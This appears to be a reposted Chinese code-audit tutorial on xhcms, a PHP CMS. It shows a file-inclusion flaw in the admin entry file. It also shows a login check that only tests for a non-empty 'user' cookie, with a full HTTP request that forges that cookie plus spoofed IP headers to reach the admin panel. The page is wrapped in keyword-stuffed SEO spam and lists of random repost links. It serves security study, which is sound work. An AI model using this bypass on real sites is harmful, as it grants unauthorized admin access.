当前位置: 首页 > wzjs >正文

华能集团网站建设方案项目分析诸城网站建设0536s

华能集团网站建设方案项目分析,诸城网站建设0536s,移动网站建设查询,建设网站的重要性Cookie脆弱 文件分析&#xff0c;首先我们进入的是admin文件下的主文件,index.php <?php //单一入口模式 error_reporting(0); //关闭错误显示 $fileaddslashes($_GET[r]); //接收文件名 $action$file?index:$file; //判断为空或者等于index include(files/.$action..ph…

Cookie脆弱

文件分析,首先我们进入的是admin文件下的主文件,index.php

<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>

通过r参数接收文件,使用三元运算符判断文件是否为空,如果为空进入index.php,不为空则进入我们r传入的文件名的文件,存在着文件包含漏洞

files/下面的文件,那我们去files文件下进行查看,先看里面的index.php C:\phpStudy\PHPTutorial\WWW\xhcms\admin\files,checklogin.php是一个检查文件的php

<?php
require '../inc/checklogin.php';
require '../inc/conn.php';
$indexopen='class="open"';
?>

C:\phpStudy\PHPTutorial\WWW\xhcms\inc·文件下,接收了user用户的cookie,并没有对它进行检验,我们可以通过user不为空进行绕过Cookie:user=121312312

<?php
$user=$_COOKIE['user'];
if ($user==""){
header("Location: ?r=login");
exit;	
}
?>

接下来我们来进行实践,访问http://192.168.118.140/xhcms/admin/?r=login,进行抓包,修改Cookie为任意值,获得数据包

GET /xhcms/admin/?r=index HTTP/1.1
Host: 192.168.118.140
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20120101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.118.140/xhcms/admin/?r=login
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: user=é¹
13213123
x-forwarded-for: 8.8.8.8
x-originating-ip: 8.8.8.8
x-remote-ip: 8.8.8.8
x-remote-addr: 8.8.8.8
Connection: keep-alive

放包直接进入后台

image.png


文章转载自:

http://yA9e3b7E.hhpbj.cn
http://1JR2l95Z.hhpbj.cn
http://Lq3NPJLz.hhpbj.cn
http://YLeUMO5o.hhpbj.cn
http://eBq4xtC6.hhpbj.cn
http://QbZwEdKO.hhpbj.cn
http://8bLtJZk9.hhpbj.cn
http://7pnvTVF0.hhpbj.cn
http://KxpgbV5G.hhpbj.cn
http://Vs2l8JPl.hhpbj.cn
http://0H7winQX.hhpbj.cn
http://aZVrn7hi.hhpbj.cn
http://pisDCsr3.hhpbj.cn
http://XlViwtXd.hhpbj.cn
http://JdTpOwC6.hhpbj.cn
http://G2cBA2Lf.hhpbj.cn
http://U0ThGvoQ.hhpbj.cn
http://Lkh2lcKf.hhpbj.cn
http://jFLUmf0F.hhpbj.cn
http://lw5JVakq.hhpbj.cn
http://dzEfJcNT.hhpbj.cn
http://liQwaKEI.hhpbj.cn
http://7e1TQriv.hhpbj.cn
http://9W3zESA3.hhpbj.cn
http://ojVYjYxQ.hhpbj.cn
http://hV4FdIOZ.hhpbj.cn
http://jDdxQksg.hhpbj.cn
http://St5BepRD.hhpbj.cn
http://HyvIzGT4.hhpbj.cn
http://XaDcsxBX.hhpbj.cn
http://www.dtcms.com/wzjs/694323.html

相关文章:

  • 手机网站的优缺点vps一定要Wordpress吗
  • 建设网站怎么赚钱discuz可以做公司网站
  • 彩票网站里的统计怎么做网站集约化建设的问题
  • 国内做的好的电商网站有哪些河源建设工程交易中心网站
  • 嘉鱼网站建设公司株洲网络学院
  • 医疗保健网站前置审批文件丽水市建设局网站
  • 太原做网站的鸣蝉公司网站开发费如何入账
  • 大连建设学校网站院长沈阳seo按天计费
  • 商城网站是怎么做的网站设置超链接
  • 淘宝网站开发的意义建网站选域名
  • 做企业网站的合同网站焦点图怎么做链接
  • 福建建设人才市场网站海口网
  • 北川建设局网站那个网站做二手买卖的
  • 天猫网站建设分析wordpress弹出提示框
  • 懒人手机网站网站服务器租用 价格
  • 程林街网站建设wordpress用户前台删除文章
  • 类似于众人帮的做任务赚佣金网站需要注册的企业网站
  • 手工制作大全简单南宁seo推广服务
  • 网站建设算什么资产网站找不到首页
  • 济南高端网站建设网页翻译功能在哪
  • 哪类型网站容易做重庆企业网站推广代理
  • 做网站平台接单网页设计心得体会1500
  • 外贸网站需要备案吗食品 网站源码
  • oss如何做网站php做的网站怎么调试
  • 大庆网站开发北京市建设工程
  • 网站搜索优化怎么做网站里的横幅广告怎么做
  • 上海企业名称查询系统百度优化插件
  • 网站 简单微信怎么注册
  • 五矿瑞和上海建设有限公司网站网页设计代码全过程
  • 南京建设人才网站宁波网站排名优化公司